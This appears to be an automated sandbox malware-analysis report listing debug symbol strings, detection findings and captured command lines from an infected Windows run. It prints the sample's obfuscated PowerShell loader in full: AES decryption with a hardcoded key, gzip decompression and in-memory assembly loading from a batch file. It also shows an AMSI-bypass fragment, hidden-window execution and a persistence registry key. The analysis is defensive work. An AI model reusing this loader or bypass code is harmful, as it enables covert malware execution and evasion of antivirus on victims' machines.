Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000002527DEE1E3C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DECA7DD push rcx; retf 003Fh 20_3_000002527DECA7DE
Source: C:\Windows\System32\conhost.exe Code function: 21_3_00000286D7CFA7DD push rcx; retf 003Fh 21_3_00000286D7CFA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB8671C7 push ebp; retf 39_2_00007FFAAB8671C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAABA171BA push ecx; retf 39_2_00007FFAABA171CC
Source: C:\Windows\System32\conhost.exe Code function: 40_3_000001D54781A7DD push rcx; retf 003Fh 40_3_000001D54781A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 41_3_000001EF0920A7DD push rcx; retf 003Fh 41_3_000001EF0920A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 42_3_000001CA7D1CA7DD push rcx; retf 003Fh 42_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe Code function: 43_3_0000017D2DD3A7DD push rcx; retf 003Fh 43_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exe Code function: 44_3_0000022F4B93A7DD push rcx; retf 003Fh 44_3_0000022F4B93A7DE
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CEA7DD push rcx; retf 003Fh 45_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CBA7DD push rcx; retf 003Fh 45_3_00000262F1CBA7DE
Source: C:\Windows\System32\svchost.exe Code function: 46_3_0000023942AFA7DD push rcx; retf 003Fh 46_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exe Code function: 47_3_000001EF056BA7DD push rcx; retf 003Fh 47_3_000001EF056BA7DE

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
